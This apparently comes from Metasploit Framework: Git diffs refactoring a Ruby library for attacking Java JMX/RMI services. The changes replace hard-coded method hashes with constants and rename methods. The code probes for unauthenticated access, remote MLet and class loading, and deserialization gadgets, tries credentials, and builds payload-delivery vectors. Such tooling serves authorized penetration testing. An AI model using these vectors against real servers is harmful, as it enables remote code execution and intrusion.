+                                                creds: @jmxcreds,
+                                                ctx: ctx,
+                                                uid: @uid,
+                                                name: obj[1],
+                                                method: 'test'))
+        end
+        vectors
+      end
+
+      def run_mlet
+        vectors = []
+        begin
+          Util.info 'Trying to create MLet instance'
+          mletname = Rex::Java::Serialization::Metamodel::JavaObject.new(
+            'Ljavax/management/ObjectName;', 'name' => 'exploit:name=Mlet')
+          args = ['javax.management.loading.MLet', mletname, nil]
+
+          # createMBean(Ljava/lang/String;Ljavax/management/ObjectName;Ljavax/security/auth/Subject;)Ljavax/management/ObjectInstance; 2510753813974665446
+          begin
+            o = sendClient(2510753813974665446, args)
+            Util.info 'Created MLet bean instance'
+          rescue Rex::Java::JRMP::JRMPError => e
+            root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+            if root[0][0] != 'javax.management.InstanceAlreadyExistsException'
+              raise
+            end
+            Util.info 'MLet bean instance already exists'
+          end
+
+          # invoke(Ljavax/management/ObjectName;Ljava/lang/String;Ljava/rmi/MarshalledObject;[Ljava/lang/String;Ljavax/security/auth/Subject;)Ljava/lang/Object; 1434350937885235744
+
+          args = [
+            mletname, 
+            'getMBeansFromURL',
+            Rex::Java::JRMP::Util.make_marshalledobject(
+              Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;',
+                                             ['http://test.invalid/test.mlet']), 
+              @reg
+            ),
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', 
+                                                               ['java.lang.String']), 
+            nil
+          ]
+          sendClient(1434350937885235744, args)
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+
+          if type == 'java.lang.SecurityException'
+            Util.okay 'MLet loading denied'
+          elsif type == 'javax.management.MBeanException'
+            Util.vuln 'MLet loading enabled: ' + root[1]['detailMessage']
+
+            vectors.push(JMXMLetVector.new(@host, 
+                                           @port, 
+                                           @objid, 
+                                           ssl: @ssl,
+                                           creds: @jmxcreds,
+                                           uid: @uid,
+                                           name: mletname,
+                                           reg: @reg))
+          else
+            Util.error 'MLet initalization failed: ' + type + ' - ' + root[1]['detailMessage']
+          end
+        end
+        vectors
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/java/serialized/rmi/jmx.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/jmx.rb
@@ -10,7 +10,7 @@ module Msf
     # RMIConnection.close()V
     CLOSE_HASH = -4742752445160157748
 
-    # RMIConnection.invoke(Ljavax/management/ObjectName;Ljava/lang/String;Ljava/rmi/MarshalledObject;[Ljava/lang/String;Ljavax/security/auth/Subject;)Ljava/lang/Object; 
+    # RMIConnection.invoke(Ljavax/management/ObjectName;Ljava/lang/String;Ljava/rmi/MarshalledObject;[Ljava/lang/String;Ljavax/security/auth/Subject;)Ljava/lang/Object;
     #
     JMX_INVOKE_HASH = 1434350937885235744
 
@@ -20,7 +20,7 @@ module Msf
     # RMIConnection.queryNames(Ljavax/management/ObjectName;Ljava/rmi/MarshalledObject;Ljavax/security/auth/Subject;)Ljava/util/Set;
     QUERY_NAMES_HASH = 9152567528369059802
 
-    # RMIConnection.createMBean(Ljava/lang/String;Ljavax/management/ObjectName;Ljavax/security/auth/Subject;)Ljavax/management/ObjectInstance; 
+    # RMIConnection.createMBean(Ljava/lang/String;Ljavax/management/ObjectName;Ljavax/security/auth/Subject;)Ljavax/management/ObjectInstance;
     CREATE_MBEAN_HASH = 2510753813974665446
 
 
@@ -91,7 +91,7 @@ module Msf
 
       # this should take the RMIServer information,
       # actual connection is made here
-      def	initialize(host, port, objId, uid: nil, methodId: -1, methodHash: 0, ssl: false, baseargs: [nil], argidx: 0, creds: nil, ctx: nil)
+      def initialize(host, port, objId, uid: nil, methodId: -1, methodHash: 0, ssl: false, baseargs: [nil], argidx: 0, creds: nil, ctx: nil)
         super(host, port, objId, uid: uid, methodHash: methodHash, ssl: ssl, baseargs: baseargs, argidx: argidx, ctx: ctx)
         @creds = creds
       end
@@ -137,7 +137,7 @@ module Msf
 
       R = Msf::Exploit::Java::Serialized::RMI
 
-      def	initialize(host, port, objId, uid: nil, ssl: false, creds: nil, name: nil, reg: nil)
+      def initialize(host, port, objId, uid: nil, ssl: false, creds: nil, name: nil, reg: nil)
         super(host, port, objId, uid: uid, ssl: ssl)
         @creds = creds
         @name = name
@@ -159,7 +159,7 @@ module Msf
           client.call(@objId, -1, R::NEW_CLIENT_HASH, [@creds], uid: @uid)
         )
         args = ['javax.management.loading.MLet', @name, nil]
-        
+
         begin
           client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
           client.call(jmxref['objid'], -1, R::CREATE_MBEAN_HASH, args, uid: jmxref['uid'])
@@ -172,21 +172,21 @@ module Msf
           Util.error 'Failed to create MLet instance: ' + e.to_s
         end
 
-        args = [@name, 
+        args = [@name,
                 'getMBeansFromURL',
                 Rex::Java::JRMP::Util.make_marshalledobject(
                   Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;',
                                                                      [payl]), @reg),
-                Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', 
-                                                                   ['java.lang.String']), 
+                Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;',
+                                                                   ['java.lang.String']),
                 nil]
 
         begin
           client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
           r = client.call(jmxref['objid'], -1, R::JMX_INVOKE_HASH, args, uid: jmxref['uid'])
 
-          if !r[1].key?('elements') || 
-              r[1]['elements'].empty? || 
+          if !r[1].key?('elements') ||
+              r[1]['elements'].empty? ||
               r[1]['elements'][0].empty? ||
               r[1]['elements'][0][1].empty? ||
               r[1]['elements'][0][1]['name'].nil?
@@ -202,16 +202,16 @@ module Msf
             Rex::Java::JRMP::Util.make_marshalledobject(
               Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;', []), @reg
             ),
-            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', []), 
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', []),
             nil
           ]
 
           client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
           r = client.call(
-            jmxref['objid'], 
-            -1, 
-            R::JMX_INVOKE_HASH, 
-            args, 
+            jmxref['objid'],
+            -1,
+            R::JMX_INVOKE_HASH,
+            args,
             uid: jmxref['uid'])
 
         rescue Rex::Java::JRMP::JRMPError => e
@@ -314,7 +314,7 @@ module Msf
         end
       end
 
-      def sendClient(methodhash, args, location: nil, customreg: nil)
+      def send_client(methodhash, args, location: nil, customreg: nil)
         return if @jmxconnref.nil?
 
         reg = @reg
@@ -335,7 +335,7 @@ module Msf
         return if @jmxconnref.nil?
 
         begin
-          connid = sendClient(R::GET_CONNID_HASH, [])
+          connid = send_client(R::GET_CONNID_HASH, [])
           Util.info 'JMX connection valid, id: ' + connid
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
@@ -343,7 +343,7 @@ module Msf
         end
 
         vectors += run_param_filter
-        vectors += run_mlet if @rc.tryMlet?
+        vectors += run_mlet if @rc.try_mlet?
         vectors += run_object_enum
         vectors
       end
@@ -351,7 +351,7 @@ module Msf
       def close
         begin
           Util.info 'Trying to close JMX connection'
-          sendClient(R::CLOSE_HASH, [])
+          send_client(R::CLOSE_HASH, [])
         rescue ::Exception
         end
         @jmxconnref = nil
@@ -362,23 +362,23 @@ module Msf
         filtered = false
         classload = false
         begin
-          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;', 
+          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;',
                                                                     'protocol' => 'http',
                                                                     'host' => 'test.invalid',
                                                                     'hashCode' => -1)
           o = send(-1, R::NEW_CLIENT_HASH, [url])
           Util.info 'JMX does not appear to require authentication'
-          unless @rc.tryMlet?
+          unless @rc.try_mlet?
             Util.vuln 'This usually means that MLet loading is allowed'
           end
           Util.vuln 'JMX auth (newClient) does not filter parameters'
-          classload = @rc.tryClassload? && Util.test_remoteclassloading(@host, 
-                                                                        @port, 
-                                                                        @reg, 
-                                                                        @objid, 
-                                                                        @uid, 
+          classload = @rc.try_classload? && Util.test_remoteclassloading(@host,
+                                                                        @port,
+                                                                        @reg,
+                                                                        @objid,
+                                                                        @uid,
                                                                         -1,
-                                                                        -1089742558549201240, 
+                                                                        -1089742558549201240,
                                                                         ssl: @ssl)
           @jmxconnref = Rex::Java::JRMP::Util.unwrap_ref(o)
           @needauth = false
@@ -393,24 +393,24 @@ module Msf
           @needauth = false
           elsif type == 'java.lang.SecurityException'
             Util.vuln 'JMX auth required, but unfiltered parameters'
-            classload = @rc.tryClassload? && Util.test_remoteclassloading(@host, 
-                                                                          @port, 
-                                                                          @reg, 
-                                                                          @objid, 
-                                                                          @uid, 
-                                                                          -1, 
-                                                                          R::NEW_CLIENT_HASH, 
+            classload = @rc.try_classload? && Util.test_remoteclassloading(@host,
+                                                                          @port,
+                                                                          @reg,
+                                                                          @objid,
+                                                                          @uid,
+                                                                          -1,
+                                                                          R::NEW_CLIENT_HASH,
                                                                           ssl: @ssl)
             @auth = true
           elsif type == 'java.lang.ClassCastException'
             Util.vuln 'JMX auth (newClient) does not filter parameters'
-            classload = @rc.tryClassload? && Util.test_remoteclassloading(@host, 
-                                                                          @port, 
-                                                                          @reg, 
-                                                                          @objid, 
-                                                                          @uid, 
-                                                                          -1, 
-                                                                          R::NEW_CLIENT_HASH, 
+            classload = @rc.try_classload? && Util.test_remoteclassloading(@host,
+                                                                          @port,
+                                                                          @reg,
+                                                                          @objid,
+                                                                          @uid,
+                                                                          -1,
+                                                                          R::NEW_CLIENT_HASH,
                                                                           ssl: @ssl)
           else
             Util.error 'JMX connection failed: ' + type
@@ -418,16 +418,16 @@ module Msf
         end
 
         if classload
-          vectors.push(RMIClassLoadingVector.new(@host, 
-                                                 @port, 
-                                                 @objid, 
+          vectors.push(RMIClassLoadingVector.new(@host,
+                                                 @port,
+                                                 @objid,
                                                  uid: @uid,
                                                  methodHash: R::NEW_CLIENT_HASH,
                                                  ssl: @ssl))
         end
 
-        if @rc.tryDeser? && !filtered
-          ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+        if @rc.try_deser? && !filtered
+          ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg,
                                                                            params: {
             'objid' => @objid,
             'methodhash' => R::NEW_CLIENT_HASH,
@@ -439,11 +439,11 @@ module Msf
           strategy.init(ctx)
 
           if ctx.run(strategy)
-            vectors.push(RMICallDeserVector.new(@host, 
-                                                @port, 
+            vectors.push(RMICallDeserVector.new(@host,
+                                                @port,
                                                 @objid,
                                                 uid: @uid,
-                                                methodHash: R::NEW_CLIENT_HASH, 
+                                                methodHash: R::NEW_CLIENT_HASH,
                                                 ssl: @ssl,
                                                 ctx: ctx))
           end
@@ -462,7 +462,7 @@ module Msf
             o = send(-1, R::NEW_CLIENT_HASH, [@jmxcreds])
             @jmxconnref = Rex::Java::JRMP::Util.unwrap_ref(o)
             Util.info 'Connection established successfully'
-            if !@auth && !@rc.tryMlet?
+            if !@auth && !@rc.try_mlet?
               Util.vuln 'This usually means that MLet loading is allowed'
             end
           rescue Rex::Java::JRMP::JRMPError => e
@@ -496,7 +496,7 @@ module Msf
       def send_param(payl, reg, params)
         args = params['args']
         args[params['argidx']] = payl
-        sendClient(params['methodhash'], args, customreg: reg)
+        send_client(params['methodhash'], args, customreg: reg)
       rescue Rex::Java::JRMP::JRMPError => e
         root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
         type = root[0][0]
@@ -511,11 +511,11 @@ module Msf
         vectors = []
         filtered = false
         begin
-          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;', 
+          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;',
                                                                     'protocol' => 'http',
                                                                     'host' => 'test.invalid',
                                                                     'hashCode' => -1)
-          sendClient(R::GET_MBEAN_CNT_HASH, [url])
+          send_client(R::GET_MBEAN_CNT_HASH, [url])
           raise 'Should not succeed'
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
@@ -533,26 +533,26 @@ module Msf
           end
         end
 
-        if @rc.tryClassload? && 
+        if @rc.try_classload? &&
             Util.test_remoteclassloading(@host,
-                                         @port, 
-                                         @reg, 
-                                         @jmxconnref['objid'], 
-                                         @jmxconnref['uid'], 
-                                         -1, 
-                                         R::GET_MBEAN_CNT_HASH, 
+                                         @port,
+                                         @reg,
+                                         @jmxconnref['objid'],
+                                         @jmxconnref['uid'],
+                                         -1,
+                                         R::GET_MBEAN_CNT_HASH,
                                          ssl: @ssl)
-          vectors.push(RMIClassLoadingVector.new(@host, 
-                                                 @port, 
+          vectors.push(RMIClassLoadingVector.new(@host,
+                                                 @port,
                                                  @jmxconnref['objid'],
                                                  uid: @jmxconnref['uid'],
                                                  methodHash: R::GET_MBEAN_CNT_HASH,
                                                  ssl: @ssl))
         end
 
-        return vectors if filtered || !@rc.tryDeser?
+        return vectors if filtered || !@rc.try_deser?
 
-        ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+        ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg,
                                                              params: {
           'methodhash' => R::GET_MBEAN_CNT_HASH,
           'args' => [nil],
@@ -562,9 +562,9 @@ module Msf
         strategy.init(ctx)
 
         if ctx.run(strategy)
-          vectors.push(JMXCallDeserVector.new(@host, 
-                                              @port, 
-                                              @objid, 
+          vectors.push(JMXCallDeserVector.new(@host,
+                                              @port,
+                                              @objid,
                                               ssl: @ssl,
                                               creds: @jmxcreds,
                                               ctx: ctx,
@@ -575,15 +575,15 @@ module Msf
       end
 
       def send_invoke(payl, reg, params)
-        sendClient(R::JMX_INVOKE_HASH, [
-          Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;', 
+        send_client(R::JMX_INVOKE_HASH, [
+          Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;',
                                                               params['name']),
           'test',
           Rex::Java::JRMP::Util.make_marshalledobject(
-            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;', [payl]), 
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;', [payl]),
             reg
           ),
-          Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', 
+          Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;',
                                                              ['java.lang.String']),
           nil
         ])
@@ -602,11 +602,11 @@ module Msf
         objects = []
         begin
           args = [
-            Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;',{}), 
-            nil, 
+            Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;',{}),
+            nil,
             nil
           ]
-          o = sendClient(R::QUERY_NAMES_HASH, args)
+          o = send_client(R::QUERY_NAMES_HASH, args)
           objects = o[1]['elements']
           Util.info 'Found ' + objects.length.to_s + ' JMX objects, checking for available gadgets...'
         rescue Rex::Java::JRMP::JRMPError => e
@@ -624,15 +624,15 @@ module Msf
           next if @@builtins.include?(on)
           Util.info "Checking object " + on
           begin
-            sendClient(R::JMX_INVOKE_HASH, [
-              Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;', 
+            send_client(R::JMX_INVOKE_HASH, [
+              Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;',
                                                                   obj[1]),
               'test',
               Rex::Java::JRMP::Util.make_marshalledobject(
-                Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;', []), 
+                Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;', []),
                 @reg
               ),
-              Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', 
+              Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;',
                                                                  ['java.lang.String']),
               nil
             ])
@@ -650,7 +650,7 @@ module Msf
             end
           end
 
-          next unless @rc.tryDeser?
+          next unless @rc.try_deser?
 
           ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, params: {
             'name' => obj[1]
@@ -659,9 +659,9 @@ module Msf
           strategy.init(ctx)
 
           next unless ctx.run(strategy)
-          vectors.push(JMXInvokeDeserVector.new(@host, 
-                                                @port, 
-                                                @objid, 
+          vectors.push(JMXInvokeDeserVector.new(@host,
+                                                @port,
+                                                @objid,
                                                 ssl: @ssl,
                                                 creds: @jmxcreds,
                                                 ctx: ctx,
@@ -681,7 +681,7 @@ module Msf
           args = ['javax.management.loading.MLet', mletname, nil]
 
           begin
-            o = sendClient(R::CREATE_MBEAN_HASH, args)
+            o = send_client(R::CREATE_MBEAN_HASH, args)
             Util.info 'Created MLet bean instance'
           rescue Rex::Java::JRMP::JRMPError => e
             root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
@@ -692,18 +692,18 @@ module Msf
           end
 
           args = [
-            mletname, 
+            mletname,
             'getMBeansFromURL',
             Rex::Java::JRMP::Util.make_marshalledobject(
               Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;',
-                                             ['http://test.invalid/test.mlet']), 
+                                             ['http://test.invalid/test.mlet']),
               @reg
             ),
-            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', 
-                                                               ['java.lang.String']), 
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;',
+                                                               ['java.lang.String']),
             nil
           ]
-          sendClient(R::JMX_INVOKE_HASH, args)
+          send_client(R::JMX_INVOKE_HASH, args)
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
           type = root[0][0]
@@ -713,9 +713,9 @@ module Msf
           elsif type == 'javax.management.MBeanException'
             Util.vuln 'MLet loading enabled: ' + root[1]['detailMessage']
 
-            vectors.push(JMXMLetVector.new(@host, 
-                                           @port, 
-                                           @objid, 
+            vectors.push(JMXMLetVector.new(@host,
+                                           @port,
+                                           @objid,
                                            ssl: @ssl,
                                            creds: @jmxcreds,
                                            uid: @uid,

--- a/lib/msf/core/exploit/java/serialized/rmi/jmx.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/jmx.rb
@@ -3,10 +3,40 @@
 module Msf
   module Exploit::Java::Serialized::RMI
 
+
+    # RMIConnection.getConnectionId()Ljava/lang/String;
+    GET_CONNID_HASH = -67907180346059933
+
+    # RMIConnection.close()V
+    CLOSE_HASH = -4742752445160157748
+
+    # RMIConnection.invoke(Ljavax/management/ObjectName;Ljava/lang/String;Ljava/rmi/MarshalledObject;[Ljava/lang/String;Ljavax/security/auth/Subject;)Ljava/lang/Object; 
+    #
+    JMX_INVOKE_HASH = 1434350937885235744
+
+    # RMIConnection.getMBeanCount(javax/security/auth/Subject;)Ljava/lang/Integer;
+    GET_MBEAN_CNT_HASH = -2042362057335820635
+
+    # RMIConnection.queryNames(Ljavax/management/ObjectName;Ljava/rmi/MarshalledObject;Ljavax/security/auth/Subject;)Ljava/util/Set;
+    QUERY_NAMES_HASH = 9152567528369059802
+
+    # RMIConnection.createMBean(Ljava/lang/String;Ljavax/management/ObjectName;Ljavax/security/auth/Subject;)Ljavax/management/ObjectInstance; 
+    CREATE_MBEAN_HASH = 2510753813974665446
+
+
+    # RMIServer.newClient(Ljava/lang/Object;)Ljavax/management/remote/rmi/RMIConnection;
+    NEW_CLIENT_HASH = -1089742558549201240
+
+    # RMIServer.getVersion()Ljava/lang/String;
+    GET_VERSION_HASH = -8081107751519807347
+
     class JMXInvokeDeserVector < RMICallDeserVector
+
+      R = Msf::Exploit::Java::Serialized::RMI
+
       # this should take the RMIServer information,
       # actual connection is made here
-      def	initialize(host, port, objId, uid: nil, ssl: false, creds: nil, ctx: nil, name: nil, method: nil)
+      def initialize(host, port, objId, uid: nil, ssl: false, creds: nil, ctx: nil, name: nil, method: nil)
         super(host, port, objId, uid: uid, ssl: ssl, ctx: ctx)
         @creds = creds
         @name = name
@@ -25,7 +55,7 @@ module Msf
         client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @ctx.reg, ssl: @ssl)
         # newClient
         jmxref = Rex::Java::JRMP.Util.unwrap_ref(
-          client.call(@objId, -1, -1089742558549201240, [@creds], uid: @uid)
+          client.call(@objId, -1, R::NEW_CLIENT_HASH, [@creds], uid: @uid)
         )
 
         args = [
@@ -39,7 +69,7 @@ module Msf
         ]
 
         begin
-          client.call(jmxref['objid'], -1, 1434350937885235744, args, uid: jmxref['uid'])
+          client.call(jmxref['objid'], -1, R::JMX_INVOKE_HASH, args, uid: jmxref['uid'])
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP.unwrap_exception(e.ex)
           type = root[0][0]
@@ -57,6 +87,8 @@ module Msf
     end
 
     class JMXCallDeserVector < RMICallDeserVector
+      R = Msf::Exploit::Java::Serialized::RMI
+
       # this should take the RMIServer information,
       # actual connection is made here
       def	initialize(host, port, objId, uid: nil, methodId: -1, methodHash: 0, ssl: false, baseargs: [nil], argidx: 0, creds: nil, ctx: nil)
@@ -79,7 +111,7 @@ module Msf
         client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @ctx.reg, ssl: @ssl)
         # newClient
         jmxref = Rex::Java::JRMP::Util.unwrap_ref(
-          client.call(@objId, -1, -1089742558549201240, [@creds], uid: @uid)
+          client.call(@objId, -1, R::NEW_CLIENT_HASH, [@creds], uid: @uid)
         )
         client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @ctx.reg, ssl: @ssl)
 
@@ -102,6 +134,9 @@ module Msf
     end
 
     class JMXMLetVector < RMICallArgumentVector
+
+      R = Msf::Exploit::Java::Serialized::RMI
+
       def	initialize(host, port, objId, uid: nil, ssl: false, creds: nil, name: nil, reg: nil)
         super(host, port, objId, uid: uid, ssl: ssl)
         @creds = creds
@@ -121,14 +156,13 @@ module Msf
         client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
         # newClient
         jmxref = Rex::Java::JRMP::Util.unwrap_ref(
-          client.call(@objId, -1, -1089742558549201240, [@creds], uid: @uid)
+          client.call(@objId, -1, R::NEW_CLIENT_HASH, [@creds], uid: @uid)
         )
         args = ['javax.management.loading.MLet', @name, nil]
-
-        # createMBean(Ljava/lang/String;Ljavax/management/ObjectName;Ljavax/security/auth/Subject;)Ljavax/management/ObjectInstance; 2510753813974665446
+        
         begin
           client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
-          client.call(jmxref['objid'], -1, 2510753813974665446, args, uid: jmxref['uid'])
+          client.call(jmxref['objid'], -1, R::CREATE_MBEAN_HASH, args, uid: jmxref['uid'])
           Util.info 'Created MLet bean instance'
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
@@ -137,8 +171,6 @@ module Msf
         rescue ::Exception => e
           Util.error 'Failed to create MLet instance: ' + e.to_s
         end
-
-        # invoke(Ljavax/management/ObjectName;Ljava/lang/String;Ljava/rmi/MarshalledObject;[Ljava/lang/String;Ljavax/security/auth/Subject;)Ljava/lang/Object; 1434350937885235744
 
         args = [@name, 
                 'getMBeansFromURL',
@@ -151,7 +183,7 @@ module Msf
 
         begin
           client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
-          r = client.call(jmxref['objid'], -1, 1434350937885235744, args, uid: jmxref['uid'])
+          r = client.call(jmxref['objid'], -1, R::JMX_INVOKE_HASH, args, uid: jmxref['uid'])
 
           if !r[1].key?('elements') || 
               r[1]['elements'].empty? || 
@@ -178,7 +210,7 @@ module Msf
           r = client.call(
             jmxref['objid'], 
             -1, 
-            1434350937885235744, 
+            R::JMX_INVOKE_HASH, 
             args, 
             uid: jmxref['uid'])
 
@@ -199,6 +231,8 @@ module Msf
 
     class JMXProber < ReferenceProber
       attr_reader :auth
+
+      R = Msf::Exploit::Java::Serialized::RMI
 
       @@builtins = [
         'java.lang:type=MemoryPool,name=Metaspace',
@@ -250,7 +284,7 @@ module Msf
         @jmxcreds = jmxcreds
         @rc = rc
         begin
-          @jmxver = send(-1, -8081107751519807347, [])
+          @jmxver = send(-1, R::GET_VERSION_HASH, [])
           Util.info 'JMX Version: ' + @jmxver.strip
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
@@ -301,7 +335,7 @@ module Msf
         return if @jmxconnref.nil?
 
         begin
-          connid = sendClient(-67907180346059933, [])
+          connid = sendClient(R::GET_CONNID_HASH, [])
           Util.info 'JMX connection valid, id: ' + connid
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
@@ -317,7 +351,7 @@ module Msf
       def close
         begin
           Util.info 'Trying to close JMX connection'
-          sendClient(-4742752445160157748, [])
+          sendClient(R::CLOSE_HASH, [])
         rescue ::Exception
         end
         @jmxconnref = nil
@@ -332,7 +366,7 @@ module Msf
                                                                     'protocol' => 'http',
                                                                     'host' => 'test.invalid',
                                                                     'hashCode' => -1)
-          o = send(-1, -1089742558549201240, [url])
+          o = send(-1, R::NEW_CLIENT_HASH, [url])
           Util.info 'JMX does not appear to require authentication'
           unless @rc.tryMlet?
             Util.vuln 'This usually means that MLet loading is allowed'
@@ -365,7 +399,7 @@ module Msf
                                                                           @objid, 
                                                                           @uid, 
                                                                           -1, 
-                                                                          -1089742558549201240, 
+                                                                          R::NEW_CLIENT_HASH, 
                                                                           ssl: @ssl)
             @auth = true
           elsif type == 'java.lang.ClassCastException'
@@ -376,7 +410,7 @@ module Msf
                                                                           @objid, 
                                                                           @uid, 
                                                                           -1, 
-                                                                          -1089742558549201240, 
+                                                                          R::NEW_CLIENT_HASH, 
                                                                           ssl: @ssl)
           else
             Util.error 'JMX connection failed: ' + type
@@ -388,7 +422,7 @@ module Msf
                                                  @port, 
                                                  @objid, 
                                                  uid: @uid,
-                                                 methodHash: -1089742558549201240,
+                                                 methodHash: R::NEW_CLIENT_HASH,
                                                  ssl: @ssl))
         end
 
@@ -396,7 +430,7 @@ module Msf
           ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
                                                                            params: {
             'objid' => @objid,
-            'methodhash' => -1089742558549201240,
+            'methodhash' => R::NEW_CLIENT_HASH,
             'argidx' => 0,
             'args' => [nil]
           })
@@ -409,7 +443,7 @@ module Msf
                                                 @port, 
                                                 @objid,
                                                 uid: @uid,
-                                                methodHash: -1089742558549201240, 
+                                                methodHash: R::NEW_CLIENT_HASH, 
                                                 ssl: @ssl,
                                                 ctx: ctx))
           end
@@ -425,7 +459,7 @@ module Msf
             Util.info 'Trying unauthenticated JMX connection'
           end
           begin
-            o = send(-1, -1089742558549201240, [@jmxcreds])
+            o = send(-1, R::NEW_CLIENT_HASH, [@jmxcreds])
             @jmxconnref = Rex::Java::JRMP::Util.unwrap_ref(o)
             Util.info 'Connection established successfully'
             if !@auth && !@rc.tryMlet?
@@ -447,7 +481,7 @@ module Msf
 
       def trylogin(user, pass)
         creds = Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', [user, pass])
-        send(-1, -1089742558549201240, [creds])
+        send(-1, R::NEW_CLIENT_HASH, [creds])
         return true
       rescue Rex::Java::JRMP::JRMPError => e
         root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
@@ -481,7 +515,7 @@ module Msf
                                                                     'protocol' => 'http',
                                                                     'host' => 'test.invalid',
                                                                     'hashCode' => -1)
-          sendClient(-2042362057335820635, [url])
+          sendClient(R::GET_MBEAN_CNT_HASH, [url])
           raise 'Should not succeed'
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
@@ -506,13 +540,13 @@ module Msf
                                          @jmxconnref['objid'], 
                                          @jmxconnref['uid'], 
                                          -1, 
-                                         -2042362057335820635, 
+                                         R::GET_MBEAN_CNT_HASH, 
                                          ssl: @ssl)
           vectors.push(RMIClassLoadingVector.new(@host, 
                                                  @port, 
                                                  @jmxconnref['objid'],
                                                  uid: @jmxconnref['uid'],
-                                                 methodHash: -2042362057335820635,
+                                                 methodHash: R::GET_MBEAN_CNT_HASH,
                                                  ssl: @ssl))
         end
 
@@ -520,7 +554,7 @@ module Msf
 
         ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
                                                              params: {
-          'methodhash' => -2042362057335820635,
+          'methodhash' => R::GET_MBEAN_CNT_HASH,
           'args' => [nil],
           'argidx' => 0
         })
@@ -535,13 +569,13 @@ module Msf
                                               creds: @jmxcreds,
                                               ctx: ctx,
                                               uid: @uid,
-                                              methodHash: -2042362057335820635))
+                                              methodHash: R::GET_MBEAN_CNT_HASH))
         end
         vectors
       end
 
       def send_invoke(payl, reg, params)
-        sendClient(1434350937885235744, [
+        sendClient(R::JMX_INVOKE_HASH, [
           Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;', 
                                                               params['name']),
           'test',
@@ -572,7 +606,7 @@ module Msf
             nil, 
             nil
           ]
-          o = sendClient(9152567528369059802, args)
+          o = sendClient(R::QUERY_NAMES_HASH, args)
           objects = o[1]['elements']
           Util.info 'Found ' + objects.length.to_s + ' JMX objects, checking for available gadgets...'
         rescue Rex::Java::JRMP::JRMPError => e
@@ -581,7 +615,7 @@ module Msf
           Util.error 'JMX enumeration failed: ' + type + ' - ' + root[1]['detailMessage']
         end
 
